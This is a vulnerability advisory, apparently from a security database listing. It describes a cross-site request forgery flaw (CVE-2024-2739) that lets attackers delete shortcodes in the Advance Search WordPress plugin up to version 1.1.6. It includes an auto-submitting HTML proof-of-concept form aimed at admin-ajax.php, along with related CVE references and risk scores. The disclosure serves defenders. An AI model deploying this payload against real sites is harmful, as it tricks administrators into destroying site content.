Lucene search
Bob MatyasWPEX-ID:5B84145B-F94E-4EA7-84D5-56CF776817A2HistoryMar 25, 2024 - 12:00 a.m.
Advance Search <= 1.1.6 - Shortcode Deletion via CSRF
2024-03-2500:00:00
Bob Matyas
22
cross-site request forgery
html form
security validation
Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
Make a logged in admin open the following HTML (replace `__FORM_ID__` with a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="WPAS_Advanced_Search_extra_ajax">
<input type="hidden" name="ajax_type" value="delete_search">
<input type="hidden" name="security" value="123">
<input type="hidden" name="form_id" value="__FORM_ID__">
<input type="hidden" name="search_form_name" value="">
<input type="submit" value="Submit Request">
</body>
```
The `security` field isn't validated and the shortcode is deleted.Related
cvelist
cvelist
CVE-2024-2739 Advance Search <= 1.1.6 - Shortcode Deletion via CSRF
2024-04-15 05:00:05
wpvulndb
wpvulndb
Advance Search <= 1.1.6 - Shortcode Deletion via CSRF
2024-03-25 00:00:00
cve
cve
CVE-2024-2739
2024-04-15 05:15:15
nvd
nvd
CVE-2024-2739
2024-04-15 05:15:15
vulnrichment
vulnrichment
CVE-2024-2739 Advance Search <= 1.1.6 - Shortcode Deletion via CSRF
2024-04-15 05:00:05
wordfence
wordfence
6.8 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.2%
Related for WPEX-ID:5B84145B-F94E-4EA7-84D5-56CF776817A2